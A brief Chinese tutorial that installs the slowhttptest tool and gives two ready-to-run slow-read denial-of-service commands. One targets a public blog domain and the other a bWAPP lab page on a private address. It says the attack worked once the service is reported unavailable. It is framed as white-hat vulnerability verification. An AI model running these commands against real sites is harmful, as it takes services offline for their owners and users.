测试工具 slowhttptest

安装方法一：

1 安装openssl和libssl-dev

• sudo apt-get install openssl
• sudo apt-get install libssl-dev

安装libssl如果失败，执行apt-get update，然后再执行sudo apt-get install libssl-dev

2 安装slowhttptest

• git clone https://github.com/shekyan/slowhttptest.git
• cd slowhttptest
• ./configure
• make
• make install

安装方法二：

• sudo apt-get install slowhttptest

白帽子验证该漏洞的语句如下：

• slowhttptest -c 1000 -X -g -o -slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://blog.cnpanda.net -p 3
• slowhttptest -c 1000 -X -g -o -slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://192.168.18.252/bWAPP/sm_dos_1.php  -p 8

等 service available 属性为NO时，说明攻击成功。